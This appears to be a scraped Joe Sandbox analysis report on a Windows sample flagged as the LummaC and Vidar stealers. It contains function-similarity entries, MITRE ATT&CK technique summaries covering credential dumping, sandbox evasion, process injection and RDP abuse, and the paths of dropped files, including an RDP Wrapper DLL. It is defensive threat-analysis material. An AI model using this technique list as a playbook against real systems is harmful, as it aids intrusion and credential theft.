Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: e1e98c2bc1ebc27d5af63402f6bff6b2baad9c437867be9b50d58d52c3bef2e9
Instruction ID: fe9e759622ae00ca6fd8bd7aad90da227a7bccf06297112498e4a772c1496dbc
Opcode Fuzzy Hash: e1e98c2bc1ebc27d5af63402f6bff6b2baad9c437867be9b50d58d52c3bef2e9
Instruction Fuzzy Hash: 115102B1A01A258FDB14CF18C99476EB7B1FF44308F46A12DC84EAB741EB30E804CBA1

Function 6C13DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C12FF2A), ref: 6C13DFFD

Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C1390FF
Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C139108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C12FF2A), ref: 6C13E04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C12FF2A), ref: 6C13E0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C12FF2A), ref: 6C13E0FE

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 89b020a775af15c092977805c0e69665cb1c8f3f50bd2f30dadb16bb8ddad62d
Instruction ID: 42ab0bf581ab65095765bc77d2ffa5e0a6b124e96bea5bfee96169f3598b7795
Opcode Fuzzy Hash: 89b020a775af15c092977805c0e69665cb1c8f3f50bd2f30dadb16bb8ddad62d
Instruction Fuzzy Hash: B141C0B17043268FEB14CF68C89036A73B6AF4630CF154929D65ADB740E736EE05CB92

Function 6C146180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C1461DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C14622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C146250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C146292

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 25c7a2346945c0896b6d6b173fc60cdb4a8cdfc395497d3a80e7a6cbf014e30e
Instruction ID: ebca8b9c013c85694be666f19a62269c1a4b73f60d325e051196556eedf22087
Opcode Fuzzy Hash: 25c7a2346945c0896b6d6b173fc60cdb4a8cdfc395497d3a80e7a6cbf014e30e
Instruction Fuzzy Hash: 0E310871A0060E8FDB04DF2CD880AAA73E9FBA530CF118639C55AD7652EB31E598CB50

Function 6C136E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C136EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C136EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C136F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C136F5C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: cca5a77a9d14b403f4fab1d66249ca8430214b3c6eb05b454c207c691aba96ce
Instruction ID: a5f840b4518c4de0f941bcbb9197577b87655e9fbaf860a995a1a9eb8e44eb16
Opcode Fuzzy Hash: cca5a77a9d14b403f4fab1d66249ca8430214b3c6eb05b454c207c691aba96ce
Instruction Fuzzy Hash: 5D310571A1061A8FEB04CF2CCC906AE73E9FB94348F508239D41AC7651EB31E659CB90

Function 6C14B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C0F0A4D), ref: 6C14B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C0F0A4D), ref: 6C14B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0F0A4D), ref: 6C14B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C0F0A4D), ref: 6C14B67F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 633b5107e7fc1320febf903d2372cd3bb167ffe084c0d229a9f96cfc6f5e295e
Instruction ID: 59befd769992bf29c44faeefa06eeb4fa2bd2694e0e367d0a999aaab870ae68b
Opcode Fuzzy Hash: 633b5107e7fc1320febf903d2372cd3bb167ffe084c0d229a9f96cfc6f5e295e
Instruction Fuzzy Hash: 8F31E671A016168FDB10DF59C8546AEBBF5FF81304F16C669C8069B305EB31E916CBE1

Function 6C11F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C11F611
memcpy.VCRUNTIME140(?,?,?), ref: 6C11F623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C11F652
memcpy.VCRUNTIME140(?,?,?), ref: 6C11F668

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 578a8525583e0dd6f728aed8d7eaa61ec711e268ec542ad8841165dd49d2e156
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: 39316FB1A04214AFC754CF1DCCC4A9FB7BAEB88354B188538FA598BF04E635E9458B90

Function 6C0E39A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E744,6C147765,00000000,6C147765,?,6C106112), ref: 6C0E39AF
LeaveCriticalSection.KERNEL32(6C16E744,?,6C106112), ref: 6C0E3A34
EnterCriticalSection.KERNEL32(6C16E784,6C106112), ref: 6C0E3A4B
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0E3A5F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 67865aa1f106bebd50ecefed91672d8451993f492b325d1cded6ad67a8ddfd1c
Instruction ID: 42c2aae4d65e3adcd314963338c065815d43b0d18165c5d6e41fe9676545a7b2
Opcode Fuzzy Hash: 67865aa1f106bebd50ecefed91672d8451993f492b325d1cded6ad67a8ddfd1c
Instruction Fuzzy Hash: DC2141323066118FC720CF2BC855B2AB7F0EF8A7187280629C96587F60DB30A901ABC1

Function 6C0FB940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0FB96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C0FB99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0FB9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0FB9B9

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 26e0a1e4dce82ca78e8b15056089d5bbe0e8249e86122cb239fc8741770a8fcb
Instruction ID: d61e5e4a3735f118ecfef113fd11eb4d0a44ce93db5cf9f8df7ad51805191cd7
Opcode Fuzzy Hash: 26e0a1e4dce82ca78e8b15056089d5bbe0e8249e86122cb239fc8741770a8fcb
Instruction Fuzzy Hash: 29117FB5A002059FCB04DF69D8809ABB7F8FF88314B14853AE929D3701E731E9558AA0

Function 6C1326B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C1326C1
free.MOZGLUE(?), ref: 6C1326E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C1326FF
free.MOZGLUE ref: 6C13270D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 89f4b36b3427eb4742333ecb67c6f781cf8dd68978729a854ad548cb2828c73a
Instruction ID: ef025c1a41db26febae81a9c20881de5abd4d66abc4d4dffddae5ebdf32929e8
Opcode Fuzzy Hash: 89f4b36b3427eb4742333ecb67c6f781cf8dd68978729a854ad548cb2828c73a
Instruction Fuzzy Hash: 00F0F9F67012105BEB00AB58D888A57B3A9FF6125CB500035EE1EC3B03E731F919C6D5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

C:\Program Files\RDP Wrapper\rdpwrap.ini

C:\ProgramData\AFHDGDGIID.exe

C:\ProgramData\BFBKFHIDHIIJ\CBAKJE

C:\ProgramData\BFBKFHIDHIIJ\EBFHJE

C:\ProgramData\BFBKFHIDHIIJ\EBFHJE-shm

C:\ProgramData\BFBKFHIDHIIJ\EHDHID

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre